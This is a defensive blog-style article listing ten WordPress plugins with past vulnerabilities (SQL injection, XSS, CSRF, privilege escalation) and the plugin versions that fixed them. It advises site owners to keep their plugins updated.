WordPress plugins provide you with numerous benefits and functionalities in designing your website. So it’s a wasted opportunity not to utilize these plugins.
For example, plugins allow you to create professional-looking forms by drag and drop instead of coding from scratch.
Plugins allow you to design websites quickly, even with little to no coding or web design experience.
However, not all of these plugins are safe and secure. Some of them may have bugs or security vulnerabilities that criminals or hackers can exploit.
Additionally, an unsecured network without a firewall or other front-line defense against malware may further expose you and your website to various cyber threats.
This article discusses these tools to familiarize you with the vulnerable WordPress plugins and prevent criminals from exploiting these issues.
What Are Vulnerable WordPress Plugins?
Vulnerabilities in WordPress plugins may cause WordPress websites to be exposed to various threats such as hacking and unauthorized data manipulation.
Criminals and hackers may use these vulnerable plugins as a backdoor to gain unauthorized access to your website. Worse, these attacks can damage the data or render the website inoperable.
To prevent or minimize the chances of these attacks from happening, updating the plugin to its latest and more secure version is recommended. If the update is unable to fix the issue, you may need to uninstall these vulnerable plugins.
Vulnerable WordPress Plugins
The following are 10 of the most vulnerable WordPress plugins. The list includes their description and whether their vulnerabilities have been addressed or not.
1. Check & Log Email
This plugin lets you log in and view all WordPress emails with ease. The Check & Log Email plugin also performs auditing and debugging of email-related issues in WordPress.
The detected vulnerability of this plugin involves SQL injection issues. An SQL injection uses malicious SQL code to perform a backdoor attack on the WordPress database and manipulate or damage the data in it without your knowledge.
As of this writing, this vulnerability has been patched. You are recommended to update this plugin to version 1.0.3 or higher.
2. WooCommerce Product Table Lite
The WooCommerce plugin allows you to create interactive product table layouts. This plugin is practical for businesses that keep inventory, like spare parts shops, restaurants, and online electronics shops.
While this table is the lite version, the pro version provides additional features. These features include compatible third-party plugins, a larger pool of table elements, and other shortcode attributes to expand product queries.
The plugin’s vulnerability is known as reflected cross-site scripting (XSS). XSS is an injection attack where hackers or criminals insert malicious scripts into otherwise harmless WordPress websites.
When a user visits that particular website, the malicious script is executed. Since the user’s internet browser assumes the website is trusted, the browser will also think the said script is from a trusted source.
A successful XSS attack lets the malicious script access all session tokens, cookies, and any sensitive personal information in the browser.
To date, this flaw has been resolved. Users using version 2.4.0 of this plugin or higher are relatively safe from XSS attacks.
3. WP Table Builder
This plugin helps users design WordPress tables easily by using drag and drop to build tables. The WP Table Builder is recommended for creating easy-to-read tables like comparison tables, lists, and pricing tables.
WP Table Builder has a similar XSS vulnerability as the WooCommerce Product Table Lite.
Hackers can use XSS attacks to gain access to a user’s internet browser or WordPress account and steal sensitive information or manipulate data without the user’s knowledge.
This vulnerability has been resolved since the developers updated the plugin to version 1.3.10.
4. Permalink Manager Lite
This plugin is an advanced WordPress permalink editor that allows users to manage URL addresses of all pages and posts. Permalinks are URL addresses that continue to remain unchanged for many years.
One helpful feature of this plugin is that it allows you to redirect old permalink addresses to new custom permalinks without getting a 404 error (page not found).
Some of this plugin’s features include:
- Complete permalink editing – You can set custom permalinks for every post or page.
- Auto-redirect – Old permalinks automatically redirect to new custom permalinks, preventing you from encountering 404 errors.
- Translate permalinks – Permalink Manager allows you to define different permalink formats per language, mainly when using other multilanguage plugins like WPML or Polylang.
The most recent major vulnerability of this plugin is SQL injection. Hackers using SQL injection attacks can gain access to a WordPress database without the owner’s knowledge.
They can also perform unauthorized data manipulation, causing incorrect or missing entries.
Developer security fixes have addressed this vulnerability in September 2021. You are recommended to use version 2.2.13.1 or higher for this update to apply to your WordPress account.
5. Countdown and CountUp, WooCommerce Sales Timer
This plugin allows you to create timers, especially for sales and marketing purposes, such as a countdown timer for a product launch.
If you’re interested in digital marketing, you might want to visit this page to know more about their SEO offers that can help you boost your brand.
This timer plugin lets you use portable calendars with hours and minutes and set time zones in your WordPress website. You can also customize the day, hour, minute, and second text fields.
Another feature of this plugin is that it lets you set an action when the timer expires, such as showing messages or images after the countdown.
Some vulnerabilities include cross-site request forgery (CSRF) and stored cross-site scripting (stored XSS).
CSRF maliciously exploits a website where unauthorized commands are sent from a user and trusted by a web application.
Stored XSS happens when data is sent from an untrusted source to an application. That unsafe data may appear in later HTTP responses.
Version 1.5.8 of the plugin fixed this vulnerability. If you are using this plugin, you are recommended to use the latest version, 1.6.7, as of this writing.
6. Ninja Forms Contact Form
Ninja Forms is considered a drag-and-drop form builder allowing WordPress users with little or no coding skills to build professional-looking forms for their websites.
The plugin developers have a support team that can assist you with any issues. The plugin is also user-friendly, so building forms does not require you to have technical skills.
Ninja Forms also allow you to upload files and turn those documents into an upload form. For example, you can export documents such as PDF, Excel files, or Google sheets.
The plugin is also helpful when you create forms that accept payment and donations or forms that provide signups and lead generation.
According to its changelog or update history, the plugin has undergone several bug fixes since it was released in 2016. One of its most recent vulnerabilities was stored XSS.
Version 3.5.8.2 resolved this vulnerability, and the plugin is now secure from stored XSS attacks. As of November 2021, the plugin’s version is 3.6.6.
7. Visual Form Builder
Visual Form Builder is another plugin for creating and managing forms in WordPress.
This plugin allows you to build functional forms in minutes without the need to write any HTML, PHP, or CSS codes.
This plugin’s features include drag and drop reordering, one-click addition of form fields, a logic-based anti-spam system, and automatic storage of entries into the WordPress database.
One of the security vulnerabilities of this plugin is stored XSS. The plugin developers resolved this issue in September 2021. If you are using this plugin, be sure to update to version 3.0.4 or higher for protection from the stored XSS vulnerability.
8. Wappointment
The Wappointment plugin allows you to quickly set appointments, such as scheduled office meetings, phone calls, or Zoom and Google Meet sessions.
The plugin provides a calendar for booking appointments and is used by teachers, therapists, personal trainers, and other service professionals.
Wappointment also lets you synchronize bookings to your Google Calendar. The plugin prevents double bookings and refreshes your availability whenever there are changes to your schedule.
The booking form is user-friendly, and it shows clients your availability, making setting appointments easy.
In addition, the plugin can send confirmations and reminders to your clients. You can set when those confirmations are sent, like one day or one hour before the appointment.
The plugin’s detected vulnerability was an unauthenticated stored XSS. The severity of this threat is considered high because the plugin can store sensitive client information.
This issue was fixed in August 2021 and is included in an update to version 2.2.5.
9. uListing
This plugin is helpful and convenient for websites specializing in classified ads and other listings.
Before this plugin was created, setting up websites with these kinds of listings was a complicated matter. Website owners usually had to invest in multiple plugins to create listings or directories.
uListing uses a drag and drop builder and customizable field forms to help create informative websites for various listing purposes, such as job postings, inventories, property sales, rentals, and real estate listings.
The uListing plugin encountered several vulnerabilities before the developers updated it to version 2.0.6. Some of these vulnerabilities include CSRF, SQL injection, and unauthenticated privilege escalation.
A privilege escalation is when a user is given access to additional resources or functionalities than is usually permitted. This privilege is normal under some circumstances, like when a user is promoted.
However, some escalations are not authorized or authenticated, and this issue can cause issues later on. One example is unauthorized access to specific data or functions that the user is not supposed to access.
Version 2.0.6 of the plugin addressed these security vulnerabilities. As of this writing, the plugin’s most secure and stable version is 2.1.0.
10. YITH Maintenance Mode
Some websites may be undergoing changes or maintenance. Website owners need a temporary page to inform visitors that the website is unavailable. This situation is where the YITH Maintenance Mode plugin comes in.
Once you have installed the plugin to your WordPress account, you only need to enable the plugin to deploy the “maintenance mode” page.
One significant vulnerability of this plugin is stored XSS. The severity of this vulnerability is low due to the nature of the plugin, which is only to show a maintenance page.
This issue was resolved in September 2021, after developers updated the plugin to version 1.4.0.
Conclusion
WordPress plugins provide a lot of functionality and benefits for website owners and content creators.
However, you must consider reviewing developer notes and updates to determine if these plugins are secure and not expose your data to criminals.
Consult an IT professional or WordPress developer for more information on WordPress plugins and what plugins may be safe or unsafe for you to use.
